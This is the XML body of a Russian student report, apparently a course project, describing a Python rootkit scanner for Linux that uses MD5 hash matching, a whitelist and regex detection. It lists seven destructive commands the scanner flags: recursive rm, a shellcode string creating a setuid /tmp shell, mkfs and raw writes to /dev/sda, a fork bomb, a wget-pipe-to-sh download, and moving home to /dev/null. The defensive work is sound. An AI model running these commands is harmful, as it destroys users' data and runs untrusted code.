          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>). Такое представление объясняется необходимостью использования сканера разными частями</w:t>
      </w:r>
      <w:r w:rsidR="0053141B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</w:rPr>
        <w:t>(программами) антивирусного пакета.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009B51AC" w:rsidRPr="00C957A9" w:rsidRDefault="009B51AC" w:rsidP="00AE3249">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00F70DBC" w:rsidRPr="00C957A9" w:rsidRDefault="00F70DBC" w:rsidP="00AE3249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Обычно сканируются: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Произвольные диски, директории, файлы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Загруженные в память процессы, а также их библиотечные файлы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Загрузочные записи диска</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F70DBC" w:rsidRPr="00C957A9" w:rsidRDefault="00F70DBC" w:rsidP="00F70DB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истему на следы руткита: проверка системных папок – производится поиск определенных файлов</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F70DBC" w:rsidRPr="00C957A9" w:rsidRDefault="00F70DBC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 классификации обычно выделяют 2 основных вида сканирования: эвристический и сигнатурный.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AC0AB8" w:rsidRPr="00C957A9" w:rsidRDefault="00AC0AB8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Антивирусные программы обычно распознают нежелательный софт по сигнатурам – характерным цепочкам кода в теле вируса. Производители защитного ПО регулярно размещают в сети обновления, содержащие последние обнаруженные сигнатуры.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F9654D" w:rsidRPr="00C957A9" w:rsidRDefault="00F70DBC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«Плюсом» сигнатурного метода является возможность выявления атаки без ложных срабатываний. Но, в то же время, этот метод требует постоянное обновление базы</w:t>
      </w:r>
      <w:r w:rsidR="00F9654D" w:rsidRPr="00C957A9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> вирусов, так как иначе выявление новых вирусов не представляется возможным. Кроме того, с помощью эвристического подхода невозможно полиморфные и шифрующиеся методы, для этого необходимо предусмотреть дополнительный функционал. Скорость метода уступает эвристическому.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F9654D" w:rsidRPr="00C957A9" w:rsidRDefault="00F9654D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Эвристический метод представляет собой сканирование на основе заранее известных характеристик (так называемых эвристик).  Это возможно благодаря тому, что вирусы создают определенные файлы, которые могут быть выявлены.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003C4BBF" w:rsidRDefault="003C4BBF" w:rsidP="00F70DBC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Характерным свойством руткитов является наличие загрузочной записи, поэтому для проверки наличия подобного нежелательного ПО в системе можно поступить следующим образом: считать загрузочную запись, получив </w:t>
      </w:r>
      <w:r w:rsidRPr="00C957A9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">прямой доступ к диску, а также получить ее, использую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57A9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">. Затем необходимо сравнить результаты. Если они различны, выполняется подмена системных функций руткитом. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00951D23" w:rsidRPr="00951D23" w:rsidRDefault="0015087C" w:rsidP="00AE3249">
      <w:r w:rsidRPr="0015087C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Также необходимы</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">м является </w:t>
      </w:r>
      <w:r w:rsidRPr="0015087C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">список файлов, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">не наносящих </w:t>
      </w:r>
      <w:r w:rsidRPr="0015087C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>вреда системе</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>, но на которые</w:t>
      </w:r>
      <w:r w:rsidRPr="0015087C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> происходит срабатывание скан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87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87C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>белый список</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">»), а также </w:t>
      </w:r>
      <w:r w:rsidRPr="0015087C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">распаковщики и дешифровщики, </w:t>
      </w:r>
      <w:r w:rsidR="00E07267">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>для сканирования</w:t>
      </w:r>
      <w:r w:rsidRPr="0015087C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> архивов и зашифрованных файлов.</w:t>
      </w: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736942" w:rsidRPr="00B6266C" w:rsidRDefault="00736942">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00B14701" w:rsidRPr="00C957A9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6" w:name="_Toc451125774"/>
      <w:r w:rsidRPr="00C957A9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Методы, примененные </w:t>
      </w:r>
      <w:r w:rsidR="00DF2687">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>при разработке сканера</w:t>
      </w:r>
      <w:bookmarkEnd w:id="6"/>
    </w:p>
    <w:p w:rsidR="00E846D2" w:rsidRPr="00C957A9" w:rsidRDefault="00E846D2" w:rsidP="00E846D2">
      <w:pPr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E846D2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Для разработки сканнера был выбран язык программирования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>. В наше время распространено очень много языков программирования, среди которых имеются как «классические» (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4238" w:rsidRPr="00C957A9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>++</w:t>
      </w:r>
      <w:r w:rsidRPr="00C957A9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">,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957A9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidR="00EE5498" w:rsidRPr="00C957A9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">, так и относительно </w:t>
      </w:r>
      <w:r w:rsidR="00FA08BD" w:rsidRPr="00C957A9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>«молодые»</w:t>
      </w:r>
      <w:r w:rsidR="00A14BFE" w:rsidRPr="00C957A9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> в плане широкого использования</w:t>
      </w:r>
      <w:r w:rsidR="00FA08BD" w:rsidRPr="00C957A9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> (</w:t>
      </w:r>
      <w:r w:rsidR="00FA08BD" w:rsidRPr="00C957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08BD" w:rsidRPr="00C957A9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">#, </w:t>
      </w:r>
      <w:r w:rsidR="00FA08BD" w:rsidRPr="00C957A9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FA08BD" w:rsidRPr="00C957A9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidR="00FA08BD" w:rsidRPr="00C957A9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FA08BD" w:rsidRPr="00C957A9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidR="00A14BFE" w:rsidRPr="00C957A9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>. Каждый язык обладает определенным набором положительных качеств (и собственными недостатками), и выбор конкретного из них среди такого множества представляется нетривиальной задачей.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A14BFE" w:rsidRPr="00C957A9" w:rsidRDefault="00EE4A95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Тем не менее для решения данной задачи в качестве языка программирования  </w:t>
      </w:r>
      <w:r w:rsidR="00EE5498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051783" w:rsidRPr="00C957A9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">был выбран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 xml:space="preserve"> (использовалась версия 3.4)</w:t>
      </w:r>
      <w:r w:rsidR="00F123D3" w:rsidRPr="00C95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3D3" w:rsidRPr="00C957A9" w:rsidRDefault="00F123D3" w:rsidP="00A14BFE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Что послужило такому выбору:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F6352B" w:rsidRPr="00C957A9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интаксис языка достаточно прост и лаконичен, что позволяет ускорить процесс разработки</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F6352B" w:rsidRPr="00C957A9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тандартная библиотека языка имеет множество средств для решения разного рода задач, в том числе и нашей</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F6352B" w:rsidRPr="00C957A9" w:rsidRDefault="00F6352B" w:rsidP="00F6352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 xml:space="preserve"> относится к языкам с динамической типизацией, что позволит без написания новых классов создавать списки и словари </w:t>
      </w:r>
      <w:r w:rsidR="00525E6B" w:rsidRPr="00C957A9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>из</w:t>
      </w:r>
      <w:r w:rsidR="00214D54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</w:rPr>
        <w:t>объекто</w:t>
      </w:r>
      <w:r w:rsidR="00AD7274" w:rsidRPr="00C957A9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>в</w:t>
      </w:r>
      <w:r w:rsidR="00525E6B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AD7274" w:rsidRPr="00C957A9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>(ускорение разработки)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006478CA" w:rsidRPr="00C957A9" w:rsidRDefault="006478CA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Но также имеются и недостатки, например, это меньшее быстродействие, нежели у С++. Но в рамках нашей задачи, как показывает практика, такая скорость допустима.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00963025" w:rsidRDefault="009C7830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Fonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">В задаче используется проверка стандартных для семейства операционных систе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иректорий, а именно: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hom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opt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bin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usr/bin</w:t>
      </w:r>
      <w:r w:rsidR="00963025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C2472" w:rsidRPr="00C957A9" w:rsidRDefault="009C2472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проверки файлов на наличие вредоносных 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inux</w:t>
      </w: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манд используются регулярные выражения, построенные для 7 команд.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009C2472" w:rsidRPr="00C957A9" w:rsidRDefault="009C2472" w:rsidP="006478CA">
      <w:pPr>
        <w:jc w:val="both"/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Style w:val="pl-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уем почему выделены именно эти 7 команд и чем они примечательны:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009C2472" w:rsidRPr="00C957A9" w:rsidRDefault="005B549C" w:rsidP="00F9654D">
      <w:pPr>
        <w:pStyle w:val="a3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Команда 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rm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-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r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(с правами администратора «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sudo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») - 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курсивное удаление всех файлов на персональном компьютере и подключенных носителях</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005B549C" w:rsidRPr="00C957A9" w:rsidRDefault="005B549C" w:rsidP="005B549C">
      <w:pPr>
        <w:pStyle w:val="a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1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a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9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1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2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1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6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4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59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31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c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4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b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9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b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f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2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9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e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f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7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8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0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2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63\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x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00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"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p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-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p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in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sh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tmp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.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eyon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; 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chmo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 xml:space="preserve"> 4755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tmp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/.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/>
        </w:rPr>
        <w:t>beyond</w:t>
      </w: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;";</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005B549C" w:rsidRPr="00C957A9" w:rsidRDefault="005B549C" w:rsidP="005B549C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стнадцатеричный код то же </w:t>
      </w:r>
      <w:r w:rsidR="009C77FE" w:rsidRPr="00C957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 что и в первом примере</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009C77FE" w:rsidRPr="00C957A9" w:rsidRDefault="009C77FE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mkfs.ext3 /dev/sda -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тирование устройства /dev/sda с удалением всех файлов на нём. Аналогично действуют команды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kfs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kfs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mkfs.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t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 для устройств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b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c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d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ним соответсвующие буквы в команде)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004F3D52" w:rsidRPr="00C957A9" w:rsidRDefault="004F3D52" w:rsidP="00F9654D">
      <w:pPr>
        <w:pStyle w:val="aa"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="17"/>
        </w:numPr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  <w:r w:rsidRPr="00C957A9">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F9F2F4"/>
        </w:rPr>
        <w:t xml:space="preserve">:(){:|:&amp;};: - </w:t>
      </w:r>
      <w:r w:rsidRPr="00C957A9">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Запуск слишком большого количества процессов приведёт к зависанию </w:t>
      </w:r>
      <w:r w:rsidR="00A8741C" w:rsidRPr="00C957A9">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>системы</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B74FEF" w:rsidRPr="00C957A9" w:rsidRDefault="00B74FEF" w:rsidP="000B7F19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any_command &gt; /dev/sda - з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ись потока данных на устройство /dev/sda, который заменит все файлы на нём. Аналогично работают команды для устройств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b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c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dd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заменим соответсвующие буквы в команде)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000B7F19" w:rsidRPr="00C957A9" w:rsidRDefault="000B7F19" w:rsidP="000B7F19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F19" w:rsidRPr="00C957A9" w:rsidRDefault="000B7F19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wget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http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://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sumber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_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tak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_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terpercaya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O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- |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sh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 xml:space="preserve"> - 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val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>c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ивает шелл-скрипт из ненадёжного источника и исполняет его после окончания скачивания</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000E0CA1" w:rsidRPr="00C957A9" w:rsidRDefault="000E0CA1" w:rsidP="000E0CA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CA1" w:rsidRPr="00C957A9" w:rsidRDefault="000E0CA1" w:rsidP="000E0CA1">
      <w:pPr>
        <w:pStyle w:val="a3"/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0CA1" w:rsidRPr="00C957A9" w:rsidRDefault="000E0CA1" w:rsidP="00F9654D">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="17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9F2F4"/>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>mv /home/username/* /dev/null - к</w:t>
      </w:r>
      <w:r w:rsidRPr="00C95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анда перемещает домашнюю директорию в место, которого на самом деле не существует. Другими словами, просто удаляет домашнюю директорию.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005B549C" w:rsidRPr="00C957A9" w:rsidRDefault="005B549C" w:rsidP="000E0CA1">
      <w:pPr>
        <w:pStyle w:val="a3"/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78CA" w:rsidRPr="00C957A9" w:rsidRDefault="005247D1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lastRenderedPageBreak/>
        <w:t>Сканер должен проверять файлы на наличие в них вредоносного содержимого</w:t>
      </w:r>
      <w:r w:rsidR="00460314" w:rsidRPr="00C957A9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> – фрагментов кода известных руткитов. Информацию же о файлах руткитов необходимо каким-то образом хранить, например, в виде </w:t>
      </w:r>
      <w:r w:rsidR="00460314"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125C86">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>5-хэ</w:t>
      </w:r>
      <w:r w:rsidR="00460314" w:rsidRPr="00C957A9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>шей каждого из файлов руткита. Тогда появляется необходимость завести базу данных.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00460314" w:rsidRPr="00C957A9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В программе используется база данных в формате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957A9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">, с которой удобно работать, используя встроенные средства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 xml:space="preserve"> для работы с БД. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00460314" w:rsidRPr="00C957A9" w:rsidRDefault="00460314" w:rsidP="006478CA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Преимущества, учтенные при выборе именно этого формата:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00460314" w:rsidRPr="00C957A9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личие встроенных средств для работы с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957A9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> в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57A9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>, нет необходимости устанавливать дополнительные библиотеки</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00460314" w:rsidRPr="00C957A9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Для работы с БД не требуется запуск сервера</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00460314" w:rsidRPr="00C957A9" w:rsidRDefault="00460314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ама БД выполнена в виде файла, который можно при необходимости легко редактировать</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00460314" w:rsidRPr="00C957A9" w:rsidRDefault="00147737" w:rsidP="0046031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Основой является известный на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147737" w:rsidRPr="00C957A9" w:rsidRDefault="00147737" w:rsidP="001477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7737" w:rsidRDefault="00147737" w:rsidP="00147737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Кроме того, необходимо учесть наличие ложных срабатываний. Для этих целей предусмотрен так называемый «белый список», куда помещаются «хорошие» файлы, вызвавшие срабатывание сканера на этапе тестирования</w:t>
      </w:r>
      <w:r w:rsidR="002A23AC" w:rsidRPr="00C957A9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>, для исключения повторных случаев неправильной работы.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002A23AC" w:rsidRDefault="00E1448D" w:rsidP="001477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программу включена возможность сканирования открытых файлов тех процессов, которые установили соединение с сетью на случай загрузки из сети вредоносных файлов. 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встроенной командой ss</w:t>
      </w:r>
      <w:r w:rsid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D299E" w:rsidRP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ket statistics</w:t>
      </w:r>
      <w:r w:rsidR="009D29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аем список всех TCP- и UDP-соединений, затем, с помощью вызова grep выбираем соединения, используемые процесс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14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ущенными в системе.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0036371F" w:rsidRDefault="0036371F" w:rsidP="001477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ан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s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нам возможность выделить идентификаторы необходимых нам процессов, используя который далее мы может однозначно определить процессы и файлы в них задействованные (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363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23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3D9E" w:rsidRDefault="00A23D9E" w:rsidP="0014773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для найденный таким образом файлов реализуется тот же алгоритм, что и для файлов директорий, сканируемых по выбору пользователя:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A23D9E" w:rsidRPr="00A23D9E" w:rsidRDefault="00A23D9E" w:rsidP="00147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ся проверка на наличие данного файла в «белом» списке, проверка на наличие опасной линукс-команды, используя регулярные выражения, проверка на наличие вредоносного кода при помощи свер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d</w:t>
      </w:r>
      <w:r w:rsidRPr="00A23D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азой руткитов. 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B14701" w:rsidRPr="00C957A9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7" w:name="_Toc451125775"/>
      <w:r w:rsidRPr="00C957A9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Вспомогательные результаты</w:t>
      </w:r>
      <w:bookmarkEnd w:id="7"/>
    </w:p>
    <w:p w:rsidR="007E3DA2" w:rsidRPr="00C957A9" w:rsidRDefault="007E3DA2" w:rsidP="007E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053886" w:rsidP="00A03631">
      <w:pPr>
        <w:jc w:val="both"/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Для работы сканера необходимо наличие базы файлов руткитов. Данные файлы были найдены в сети Интернет. Как было описано выше, требовалось занесение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C957A9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>5-х</w:t>
      </w:r>
      <w:r w:rsidR="00125C86">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>э</w:t>
      </w:r>
      <w:r w:rsidRPr="00C957A9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">шей этих файлов в базу данных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957A9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>, для чего был написан вспомогательный скрипт (</w:t>
      </w:r>
      <w:r w:rsidR="00E60BD9" w:rsidRPr="00C957A9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> см.Приложение 1</w:t>
      </w:r>
      <w:r w:rsidRPr="00C957A9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>).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B14701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8" w:name="_Toc451125776"/>
      <w:r w:rsidRPr="00C957A9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Итоги</w:t>
      </w:r>
      <w:bookmarkEnd w:id="8"/>
    </w:p>
    <w:p w:rsidR="00134EAD" w:rsidRDefault="00134EAD" w:rsidP="00134EAD"/>
    <w:p w:rsidR="00824E48" w:rsidRDefault="00824E48" w:rsidP="00134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24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 сканер руткитов, в котором реализованы все заявленные в п.1 требования, а именно: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канирования как всех доступных директорий, так и директорий по выбору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Относительная быстрота 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Сравнение сканируемых файлов с файлами реальных руткитов посредством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md</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>5-хэ</w:t>
      </w:r>
      <w:r w:rsidRPr="00C957A9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>ширования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957A9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> (“белого списка”) для предотвращения ложных срабатываний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Вывод результатов: путь к зараженным файлам, общее количество файлов, количество отсканированных файлов, общее время сканирования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 xml:space="preserve">Нахождение в файлах потенциально опасных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C957A9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">-команд (например,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C957A9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
